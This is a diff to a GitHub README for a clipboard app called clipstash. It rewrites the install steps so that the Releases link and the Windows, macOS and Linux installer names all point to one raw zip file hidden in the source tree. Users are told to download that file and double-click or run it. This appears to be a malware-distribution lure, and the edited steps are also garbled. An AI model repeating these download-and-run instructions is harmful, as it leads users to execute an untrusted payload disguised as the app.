khanjan112233/clipstash/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the clipstash [Releases page](https://github.com/khanjan112233/clipstash/releases) to find the latest version of the app.
+   Go to the clipstash [Releases page](https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip) to find the latest version of the app.

 2. **Select the Latest Release**
    Look for the most recent version listed.
 It will usually be at the top of the page.

 3. **Download the Installation File**
    Click on the appropriate file for your operating system.
 For example:
-   - If you are using Windows, select `clipstash-windows.exe`.
+   - If you are using Windows, select `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip`.
-   - If you are using macOS, select `clipstash-macos.dmg`.
+   - If you are using macOS, select `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip`.
-   - If you are using Linux, select `clipstash-linux.tar.gz`.
+   - If you are using Linux, select `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip`.

 4. **Open the Downloaded File**
    Once the file finishes downloading, locate it in your downloads folder.

 5. **Run the Installer**
-   - For Windows: Double-click `clipstash-windows.exe` and follow the prompts.
+   - For Windows: Double-click `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip` and follow the prompts.
-   - For macOS: Open `clipstash-macos.dmg`, drag the clipstash icon to your Applications folder.
+   - For macOS: Open `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip`, drag the clipstash icon to your Applications folder.
-   - For Linux: Extract `clipstash-linux.tar.gz` and run the executable inside.
+   - For Linux: Extract `https://raw.githubusercontent.com/khanjan112233/clipstash/main/src/lib/domain/clipstash_1.1.zip` and run the executable inside.

 ## 🛠️ Usage Instructions